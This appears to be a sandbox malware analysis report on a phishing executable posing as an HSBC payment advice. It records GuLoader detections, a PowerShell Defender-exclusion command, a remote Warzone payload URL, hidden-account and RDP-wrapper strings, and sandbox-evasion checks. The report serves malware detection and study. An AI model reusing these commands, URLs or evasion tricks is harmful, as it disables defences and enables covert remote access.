              Source: HSBC Payment Advice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
              Source: C:\ProgramData\images.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
              Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe" Jump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exeJump to behavior
              Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile created: C:\Users\user\AppData\Local\Microsoft Vision\Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkoahsjv.1ht.ps1Jump to behavior
              Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@10/6@3/1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_01
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior

              Data Obfuscation:

              barindex
              Yara detected GuLoaderShow sources
              Source: Yara matchFile source: 00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.378161921.0000000000710000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, type: MEMORY
              Yara detected VB6 Downloader GenericShow sources
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00402440 push 0040119Ah; ret 0_2_00402453
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00407A43 push ecx; ret 0_2_00407A44
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00402454 push 0040119Ah; ret 0_2_00402467
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00402468 push 0040119Ah; ret 0_2_0040247B
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00407E78 push 4EEBB783h; ret 0_2_00407E7D
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00405679 push ds; iretd 0_2_00405762
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_0040247C push 0040119Ah; ret 0_2_0040248F
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00402418 push 0040119Ah; ret 0_2_0040242B
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_0040242C push 0040119Ah; ret 0_2_0040243F
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004024CC push 0040119Ah; ret 0_2_004024DF
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004024E0 push 0040119Ah; ret 0_2_004024F3
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004024F4 push 0040119Ah; ret 0_2_00402507
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00402490 push 0040119Ah; ret 0_2_004024A3
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00405692 push ds; iretd 0_2_00405762
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00408A9F push 3A3ADF06h; retf 0_2_00408AA7
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004024A4 push 0040119Ah; ret 0_2_004024B7
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004024B8 push 0040119Ah; ret 0_2_004024CB
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004023C8 push 0040119Ah; ret 0_2_004023DB
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004023DC push 0040119Ah; ret 0_2_004023EF
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004095E9 push ebp; iretd 0_2_004095EA
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004063EC push ecx; iretd 0_2_004063ED
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004023FF push 0040119Ah; ret 0_2_00402417
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004023AF push 0040119Ah; ret 0_2_004023C7
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 12_2_017B01D0 push ebx; retf 12_2_017B01D9
              Source: C:\ProgramData\images.exeCode function: 28_2_017A1819 push ss; iretd 28_2_017A1CFC
              Source: C:\ProgramData\images.exeCode function: 28_2_017A0877 push ds; iretd 28_2_017A0973
              Source: C:\ProgramData\images.exeCode function: 28_2_017A20E4 push ds; ret 28_2_017A20E5
              Source: C:\ProgramData\images.exeCode function: 28_2_017A1CDB push ss; iretd 28_2_017A1CFC
              Source: C:\ProgramData\images.exeCode function: 28_2_017A1C97 push ss; iretd 28_2_017A1CFC
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile created: C:\ProgramData\images.exeJump to dropped file
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile created: C:\ProgramData\images.exeJump to dropped file

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Contains functionality to hide user accountsShow sources
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
              Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\images.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Tries to detect Any.runShow sources
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Source: C:\ProgramData\images.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
              Source: C:\ProgramData\images.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Source: C:\ProgramData\images.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
              Source: C:\ProgramData\images.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=
              Source: HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://SPUREDGE.COM/WARZONE_JBBOXCEY72.BIN
              Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
